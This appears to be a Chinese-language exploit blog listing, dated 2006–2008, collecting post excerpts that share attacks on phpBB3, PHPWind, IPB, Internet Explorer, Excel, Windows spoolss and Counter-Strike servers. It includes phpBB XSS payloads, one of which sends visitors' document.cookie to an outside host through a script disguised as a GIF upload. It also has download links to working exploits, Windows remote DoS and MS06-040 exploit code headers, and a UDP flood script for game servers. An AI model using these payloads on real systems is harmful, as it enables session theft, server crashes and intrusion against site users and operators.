XSS Private Messagging On PhpBB3(0day)

作者:ZhaoHuAn 日期:2008-08-18

################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]

程序代码

http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779

Where is:

程序代码

[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}

Redirect Code [Ascii --> Hex]:

程序代码

[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74...

分类:eXploit | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 2059

MSOffice Excel Code Execution Exploit (MS08-014)

作者:ZhaoHuAn 日期:2008-03-28

Tested on:

Microsoft Windows XP SP2 && Microsoft Offset 2003 < SP3 or No MS08-014 Patch

download1:
http://www.chroot.org/exploits/zha0_ms08_014.rar

download2:
http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar

/debug

其实2月份就有人放出了exp~

分类:eXploit | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2031

迅雷5 ThunderAgent Module 远程拒绝服务漏洞

作者:ZhaoHuAn 日期:2006-12-31

刺在群里发了一下顺手贴上来元旦快乐~！
迅雷5 ThunderAgent Module 远程拒绝服务漏洞

by axis(axis_at_ph4nt0m.org)

摘要:

迅雷是由Thunder Networking公司开发的一个下载软件，在中国有着非常广泛的用户。迅雷5的ThunderAgent_005.dll中注册了一个activex控件，当Internet Explorer调用他的某些方法时，将会造成整数溢出，成功利用将造成Internet Explorer崩溃。

影响版本:

迅雷5.5.2.252(已测试)，
迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)
其他版本可能也受影响

细节:

在ThunderAgent_005.dll中，有两处方法调用时忽略了输入参数异常的情况，当输入参数为精心构造的负数或大整数时，将造成整数溢出，产生不可预料的结果，从而造成浏览器崩溃。

该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}
Method原型如下：

[id(0x00000006), helpstring("method GetInfoStruct")]
void GetInfoStruct([in] int pInfo);

[id(0x00000007), helpstring("method GetTaskInfoStruct")]
vo...

分类:eXploit | 固定链接 | 评论: 1 | 引用: 9 | 查看次数: 6243

MS Windows spoolss GetPrinterData() Remote DoS exp

作者:ZhaoHuAn 日期:2006-12-02

MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day)

程序代码

#!/usr/bin/python
# MS Windows spoolss GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# C:\>python spoolss_dos.py 192.168.0.2 512
#
#

MS Windows GetPrinterData() 0day Memory Allocation Remote DoS Exploit
#

Coded by h07 &l...

分类:eXploit | 固定链接 | 评论: 0 | 引用: 17 | 查看次数: 3745

DDos CS 1.6 server

作者:ZhaoHuAn 日期:2006-11-17

点击下载此文件

e.g:

c:\cs.pl IP 端口(默认端口是27015)

如果需要修改端口可编辑此行

程序代码

IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');

分类:eXploit | 固定链接 | 评论: 0 | 引用: 5 | 查看次数: 4150

PHPWind <= 5.0.1注入漏洞

作者:ZhaoHuAn 日期:2006-11-13

比较有意思作者连续发布了好几个PHP漏洞全是中文系统的包括前段时间的discuz.这次又是phpwind。

exp:(不同于milw0rm的新增和修改了些东西)
http://retrogod.altervista.org/phpwind_501_blind_inj_ii.html

漏洞利用录象 http://retrogod.altervista.org/phpwind.rar

目前还没有发布任何补丁

引用一下作者的话:‘I think I have to change forum rules... no more exploit direct requests, no kiddies.“

分类:eXploit | 固定链接 | 评论: 3 | 引用: 5 | 查看次数: 4435

IPB <= 2.1.7 (Debug) Remote Password Change Exp

作者:ZhaoHuAn 日期:2006-11-02

首先说明的是这个版本不同于
http://www.milw0rm.com/exploits/2696 这个，milw0rm的这个版本需要修改php.ini(extension curl.dll)，否则运行会出现
Fatal error: Call to undefined function: curl_init() in ipb2.php on line 37
exp:
下载文件

点击下载此文件
在线测试::::::::::::>http://chcrew.info/files/ipb217.php

分类:eXploit | 固定链接 | 评论: 2 | 引用: 11 | 查看次数: 4562

IE7 Popup Address Bar Spoofing Weakness

作者:ZhaoHuAn 日期:2006-10-29

<!--
Secunia Advisory:       SA22542
Release Date:         2006-10-25
Impact:         Spoofing
Solution Status:     Unpatched
Software:        Microsoft Internet Explorer 7.x

Description:
A weakness has been discovered in Internet Explorer, which can be exploited by malicious
people to conduct phishing attacks.
...

分类:eXploit | 固定链接 | 评论: 0 | 引用: 6 | 查看次数: 4067

Internet Explorer Vector Markup Language buffer...

作者:ZhaoHuAn 日期:2006-09-25

Microsoft Internet Explorer Vector Markup Language Buffer Overflow Vulnerability
Poc:
http://www.milw0rm.com/exploits/2400

The following exploits are available:
http://www.securityfocus.com/bid/20096/exploit/data/vulnerabilities/exploits/20096.html
http://www.securityfocus.com/bid/20096/exploit/data/vulnerabilities/exploits/vml.c
http://www.securityfocus.com/bid/20096/exploit/data/vulnerabilities/exploits/20096.pl
http://www.securityfocus.com/bid/20096/exploit/data/vulnerabilities/exploits/20096_jamikazu.txt

分类:eXploit | 固定链接 | 评论: 0 | 引用: 566 | 查看次数: 10393

Xss phpBB 3.0

作者:ZhaoHuAn 日期:2006-09-23

Apri un editor di testo come il "blocco note"

inserisci il seguente script

<script>document.location.replace('http://www.zhaohuan.net/FILE.php?c='+document.cookie);</script>

salva il file in img.gif ( . GIF )

Quando stai per postare, vai in basso su : "Attachment uploading"

inserisci la tua immagine.

Adesso in basso trovi "Posted attachments" e sotto ad esso la tua immagine&n...

分类:eXploit | 固定链接 | 评论: 0 | 引用: 13 | 查看次数: 5186

MS06-040(2k3)

作者:ZhaoHuAn 日期:2006-09-14

MS06-040连续发了好几个版本 !-_-#

程序代码

#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
# For educational purpose only
#
# Note: This exploit is developed because of my question "Is it exploitable
# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
# Server 2003&...

分类:eXploit | 固定链接 | 评论: 0 | 引用: 12 | 查看次数: 4966